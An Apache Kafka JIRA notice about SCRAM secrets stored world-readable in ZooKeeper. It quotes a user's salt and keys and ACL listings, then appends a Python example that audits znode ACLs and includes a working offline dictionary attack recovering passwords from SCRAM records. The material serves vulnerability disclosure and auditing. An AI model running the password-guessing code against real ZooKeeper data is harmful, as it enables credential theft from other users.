[ https://issues.apache.org/jira/browse/KAFKA-4943?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15940828#comment-15940828 ]
ASF GitHub Bot commented on KAFKA-4943:
---------------------------------------

GitHub user rajinisivaram opened a pull request:

    https://github.com/apache/kafka/pull/2733

    KAFKA-4943: Make /config/users with SCRAM credentials not world-readable

You can merge this pull request into a Git repository by running:

    $ git pull https://github.com/rajinisivaram/kafka KAFKA-4943

Alternatively you can review and apply these changes as the patch at:

    https://github.com/apache/kafka/pull/2733.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

    This closes #2733

----
commit 8ab3c5ab5787e795bff779354ad34ca1921107a1
Author: Rajini Sivaram <rajinisiva...@googlemail.com>
Date:   2017-03-24T15:44:49Z

    KAFKA-4943: Make /config/users with SCRAM credentials not world-readable

----


> SCRAM secrets should be better protected with Zookeeper ACLs
> -------------------------------------------------------------
>
>                 Key: KAFKA-4943
>                 URL: https://issues.apache.org/jira/browse/KAFKA-4943
>             Project: Kafka
>          Issue Type: Improvement
>            Reporter: Johan Ström
>            Assignee: Rajini Sivaram
>
> With the new SCRAM authenticator the secrets are stored in Zookeeper:
> {code}
> get /kafka/config/users/alice
> {"version":1,"config":{"SCRAM-SHA-512":"salt=ODhnZjNkdWZibTV1cG1zdnV6bmh6djF3Mg==,stored_key=BAbHWHuGEb4m5+U+p0M9oFQmOPhU6M7q5jtZY8deDDoZCvxaqVNLz41yPzdgcp1WpiEBmfwYOuFlo9hMFKM7mA==,server_key=JW3KhpMeyUgh0OAC0kejuFUvUSlXBv/Z68tlfOWcMw5f5jrBwyBnjNQ9VZsSYz1AcI9IYaQ5S6H3yN39SieNiA==,iterations=4096"}}
> {code}
> These are stored without any ACL, and zookeeper-security-migration.sh does
> not seem to change that either:
> {code}
> getAcl /kafka/config/users/alice
> 'world,'anyone
> : cdrwa
> getAcl /kafka/config/users
> 'world,'anyone
> : cdrwa
> getAcl /kafka
> 'world,'anyone
> : r
> 'sasl,'bob
> : cdrwa
> getAcl /kafka/config/changes
> 'world,'anyone
> : r
> 'sasl,'bob
> : cdrwa
> {code}
> The above output is after running the security migrator; for some reason
> /kafka/config/users is ignored, but others are fixed.
> Even if these were to be stored with secure ZkUtils#DefaultAcls, they would
> be world readable.
> From my (limited) point of view, they should be readable by Kafka only.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
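Added example, not part of the issue, the pull request or Kafka's own code. It does two things the report above implies but does not spell out: it audits `getAcl` output in the layout zkCli prints and flags any world-readable znode under `/config/users` (ordinary metadata such as `/kafka` being world-readable is the ZkUtils default and is only noted), and it shows what a reader of that znode gets. The record holds the salt, the iteration count and the stored key, which is everything RFC 5802 needs to test candidate passwords offline, and the server key, which is what lets a party pose as the server. The `getAcl` samples and the `alice123` record are constructed here; `ISSUE_ALICE` copies the znode value quoted in the issue verbatim. The chroot `/kafka` and the SCRAM-SHA-512 to `sha512` mapping are assumptions for this example.

```python
"""Audit ZooKeeper ACLs on Kafka's /config/users znodes and show what a
world-readable SCRAM record gives an attacker.  Added example; not Kafka code."""
import base64
import hashlib
import hmac
import json
import re

# Constructed `getAcl` output in the layout zkCli prints (as quoted in the
# issue): one "'scheme,'id" line followed by a ": perms" line per ACL entry.
SAMPLE_GETACL = {
    "/kafka": "'world,'anyone\n: r\n'sasl,'bob\n: cdrwa\n",
    "/kafka/config/changes": "'world,'anyone\n: r\n'sasl,'bob\n: cdrwa\n",
    "/kafka/config/users": "'world,'anyone\n: cdrwa\n",
    "/kafka/config/users/alice": "'world,'anyone\n: cdrwa\n",
}
SECRET_PREFIX = "/kafka/config/users"   # assumes the /kafka chroot used in the issue

# Znode value quoted in the issue for alice, copied verbatim.
ISSUE_ALICE = ('{"version":1,"config":{"SCRAM-SHA-512":"salt=ODhnZjNkdWZibTV1cG1zdnV6bmh6djF3Mg==,'
               'stored_key=BAbHWHuGEb4m5+U+p0M9oFQmOPhU6M7q5jtZY8deDDoZCvxaqVNLz41yPzdgcp1WpiEBmfwYOuFlo9hMFKM7mA==,'
               'server_key=JW3KhpMeyUgh0OAC0kejuFUvUSlXBv/Z68tlfOWcMw5f5jrBwyBnjNQ9VZsSYz1AcI9IYaQ5S6H3yN39SieNiA==,'
               'iterations=4096"}}')

ACL_ENTRY = re.compile(r"'(?P<scheme>[^,']+),'(?P<id>[^\n]*)\n: (?P<perms>[cdrwa]+)")
SCRAM_FIELD = re.compile(r"(\w+)=([^,]+)")
HASH_FOR_MECHANISM = {"SCRAM-SHA-256": "sha256", "SCRAM-SHA-512": "sha512"}  # assumed mapping


def parse_getacl(text):
    """Return [(scheme, id, perms), ...] from getAcl output."""
    return [(m["scheme"], m["id"], m["perms"]) for m in ACL_ENTRY.finditer(text)]


def world_can_read(acl):
    """True if the anonymous world:anyone principal holds the r bit."""
    return any(s == "world" and i == "anyone" and "r" in p for s, i, p in acl)


def audit(getacl_by_path):
    """World read on ordinary metadata (e.g. /kafka) is the default and is only
    noted as INFO; on anything under /config/users it exposes SCRAM records."""
    findings = []
    for path, out in sorted(getacl_by_path.items()):
        if not world_can_read(parse_getacl(out)):
            continue
        under_users = path == SECRET_PREFIX or path.startswith(SECRET_PREFIX + "/")
        findings.append(("HIGH" if under_users else "INFO", path))
    return findings


def scram_record(znode_json, mechanism="SCRAM-SHA-512"):
    """Decode the 'salt=...,stored_key=...,server_key=...,iterations=N' value
    stored under the mechanism key of the znode's JSON."""
    fields = dict(SCRAM_FIELD.findall(json.loads(znode_json)["config"][mechanism]))
    return {
        "salt": base64.b64decode(fields["salt"]),
        "stored_key": base64.b64decode(fields["stored_key"]),
        "server_key": base64.b64decode(fields["server_key"]),
        "iterations": int(fields["iterations"]),
    }


def derive_keys(password, salt, iterations, hash_name="sha512"):
    """RFC 5802: SaltedPassword = Hi(password, salt, i) (PBKDF2-HMAC, one block);
    ClientKey = HMAC(SaltedPassword, "Client Key"); StoredKey = H(ClientKey);
    ServerKey = HMAC(SaltedPassword, "Server Key")."""
    salted = hashlib.pbkdf2_hmac(hash_name, password.encode("utf-8"), salt, iterations)
    client_key = hmac.new(salted, b"Client Key", hash_name).digest()
    stored_key = hashlib.new(hash_name, client_key).digest()
    server_key = hmac.new(salted, b"Server Key", hash_name).digest()
    return stored_key, server_key


def b64(raw):
    return base64.b64encode(raw).decode("ascii")


def make_znode(password, salt, iterations=4096, mechanism="SCRAM-SHA-512"):
    """Build a znode value in the format shown in the issue (constructed test data)."""
    stored, server = derive_keys(password, salt, iterations, HASH_FOR_MECHANISM[mechanism])
    value = f"salt={b64(salt)},stored_key={b64(stored)},server_key={b64(server)},iterations={iterations}"
    return json.dumps({"version": 1, "config": {mechanism: value}})


def guess_password(znode_json, candidates, mechanism="SCRAM-SHA-512"):
    """Offline dictionary check.  Salt and iteration count are in the record,
    so anyone who can read the znode can run this without touching a broker."""
    rec = scram_record(znode_json, mechanism)
    hash_name = HASH_FOR_MECHANISM[mechanism]
    for pw in candidates:
        stored, _ = derive_keys(pw, rec["salt"], rec["iterations"], hash_name)
        if hmac.compare_digest(stored, rec["stored_key"]):
            return pw
    return None


# Constructed record: a weak password for "alice", 4096 iterations as in the issue.
CONSTRUCTED_ALICE = make_znode("alice123", b"constructed-salt-value", 4096)

if __name__ == "__main__":
    for severity, path in audit(SAMPLE_GETACL):
        print(f"{severity:4} world-readable: {path}")
    print("guessed:", guess_password(CONSTRUCTED_ALICE, ["password", "kafka", "alice123"]))
```

Run it as a script to see the four findings and the recovered password. To use it against a live ensemble, feed `audit()` the `getAcl` text for each child of `/config/users` and `guess_password()` the `get` output of one of them; a node whose ACL carries only the broker's SASL principal (for example `'sasl,'kafka` with `cdrwa` and no `world` entry) is what the report asks for, and `world_can_read()` returns false for it.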